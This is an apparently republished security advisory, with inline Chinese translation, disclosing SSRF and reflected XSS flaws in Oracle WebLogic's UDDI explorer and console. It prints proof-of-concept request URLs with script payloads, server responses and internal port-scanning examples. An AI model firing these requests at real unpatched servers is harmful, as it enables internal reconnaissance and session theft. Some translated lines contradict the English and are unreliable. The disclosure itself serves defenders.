[Ref]http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
WebLogic SSRF and XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)
Monday, March 30, 2015 at 7:51AM
Universal Description Discovery and Integration (UDDI) functionality often lurks(潛伏) unlinked(無連接) but externally accessible on WebLogic servers. It’s trivially discoverable using fuzz lists such as Weblogic.fuzz.txt and was, until recently, vulnerable to Cross Site Scripting (XSS) and Server Side Request Forgery (SSRF). I reported these vulnerabilities to Oracle and they were patched in the July 2014 Critical Patch Update (CPU).
WebLogic 服務器的 UDDI 功能通常很隱蔽,但外部可以訪問。利用 weblogic.fuzz.txt 很容易發現該漏洞,但是直到最近才發現容易造成 XSS 和 SSRF 漏洞。我向 Oracle(收購了SUN)報告了該漏洞,廠商在2014年7月的嚴重補丁更新中進行了修復。
CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jsp
Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6
Oracle WebLogic web server is often both (a) externally accessible; and (b) permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to cause the WebLogic web server to connect to an arbitrary TCP port of an arbitrary host. Responses returned are fairly verbose and can be used to infer whether a service is listening on the port specified.
Oracle的 WebLogic web服務器通常(a)外部可訪問;(b)被允許調用對內部主機的連接。 SearchPublicRegistries.jsp 頁面可被未認證的攻擊者濫用,造成 WebLogic 服務器連接任意主機的任意端口。其返回信息非常詳細,可被攻擊者用來推斷在指定端口是否有相關服務在監聽。
Below is an example request to an internal host which is not listening on TCP port 23:
下面是一個例子:某內部主機未監聽TCP 23 端口。
https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
Response snippet:
weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused
Below is an example request to a host which is listening on TCP port 22:
下面是另一個例子:某內部主機在對TCP 22端口進行監聽。
https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
Response snippet:
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.
It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can access. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of the response.
可以使用該功能對 WebLogic 可訪問的所有主機端口進行探測。上例中,探測到的服務會返回合法的 SOAP 響應信息,甚至可以看到相應的完整信息。
SSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).
CVE-2014-4241 - Reflected Cross Site Scripting in SetupUDDIExplorer.jsp
Affected software: Oracle Fusion Middleware 10.0.2, 10.3.6
User input is reflected into a cookie value (which is set for a year!). This value is then written into subsequent responses in an unsafe manner, exposing users to Cross Site scripting attacks.
用戶的輸入被設置到了 cookie 值中(尼瑪,居然有效期是1年)。隨后,該值以一種不安全的方式被寫入后續的所有子請求響應包中,導致用戶很容易遭受 XSS 攻擊。
This unusual vector circumvents current in-browser anti-XSS controls present in Internet Explorer and Chrome browsers. The vulnerability was present in registration.paypal.com, payflowlink.paypal.com and partnermanager.paypal.com; all were swiftly fixed after I reported this to the PayPal security team.
這種奇葩的攻擊向量(vector)可以繞過 IE 和 Chrome 當前內置的防 XSS 模塊。該漏洞在 *.paypal.com 都存在,我報告給Paypal安全組之后得到了修復。
Reflected XSS in registration.paypal.com
Example Malicious URL:
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL
The response sets the privateregistry parameter value previously supplied as a cookie, and redirects the browser back to the SetupUDDIExplorer.jsp page:
HTTP/1.1 302 Moved Temporarily
Location: https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp
Set-Cookie: privateinquiryurls=<script>alert(2)</script>; expires=Saturday, 29-Nov-2014 08:00:27 GMT
Content-Length: 331
Content-Type: text/html;charset=UTF-8
Redirected Request:
GET /uddiexplorer/SetupUDDIExplorer.jsp HTTP/1.1
Host: [vulnerablehost]
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=<script>alert(2)</script>; privatepublishurls=http://[vulnerablehost]:8080/uddi/uddilistener; consumer_display=HOME_VERSION%3d1%26FORGOT_BUTTON_ROLE%3d73; cookie_check=yes; LANG=en_US%3BUS; navlns=0.0;
Response Snippet (showing the privateinquiryurls cookie value reflected in an unsafe manner in the response):
<td valign=top width=1%></td>
<td valign=top width=70%>
<p>
<h2>Private Registry:</h2>
<h3>Search URL: <b><script>alert(1)</script></b></h3>
<H3>Publish URL: <b>http://[vulnerablehost]:8080/uddi/uddilistener</b></h3>
</p>
Example Proof of Concept URLs:
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2</script>&setPrivateRegistryPublish=Set+Publish+URL
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?publicregistryname=test&publicregistryurl=<script>alert(2)</script>&addPublicRegistry=Add+Public+Registry+URL
CVE-2014-4242 - Reflected Cross Site Scripting in consolejndi.portal
Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6, 12.1.1, 12.1.2.0.0
I’ve also identified two reflected XSS vulnerabilities in WebLogic’s console application. The console application is intended to manage the WebLogic application server and is not normally externally exposed; as a result, exploitation of this vulnerability would be targeted at admin users.
我還在 WebLogic 的控制台應用中發現了兩處 XSS 漏洞。控制台應用被用來管理 WebLogic 應用服務器,通常暴露給外網。結果就是,漏洞利用者可以直接攻擊管理員用戶。
Example Proof of Concept URL #1 (victim must be authenticated to the administrative console):
http://[vulnerablehost]:7001/console/consolejndi.portal?_pageLabel=JNDIContextPageGeneral&_nfpb=true&JNDIContextPortlethandle=
com.bea.console.handles.JndiContextHandle("<script>alert(1)</script>")
Response Snippet:
<div class="contenttable"><div class="introText">
<p>Listing of entries found in context <script>alert(1)</script>:</p>
</div>
Example Proof of Concept URL #2 (victim must be authenticated to the administrative console):
http://[vulnerablehost]:7001/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//
Response Snippet:
<script type="text/javascript">
document.write('<div class="JSTree">');
setBaseDirectory('/console/utils/JStree/images/');
setTaxonomyDelimeter('.');
{
_a = new TreeNode('server', null, 'myserver\u0027);alert(4)//', '/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//', 'images/spacer.gif', 'images/spacer.gif', null, 'myserver\u0027);alert(4)//', false, false);
Remediation
Remove access to UDDI functionality, unless there is business case to support exposing it. Failing that, ensure that the July 2014 CPU has been applied.
修復方案:禁止對 UDDI 功能的訪問,除非是業務需要。 確保打了 Oracle 2014年7月的CPU(高危補丁更新)補丁。
Disclosure Timeline
01/12/2013 - Vulnerability Reported
07/16/2014 - Vulnerability Patch Released in Oracle Critical Patch Update (CPU)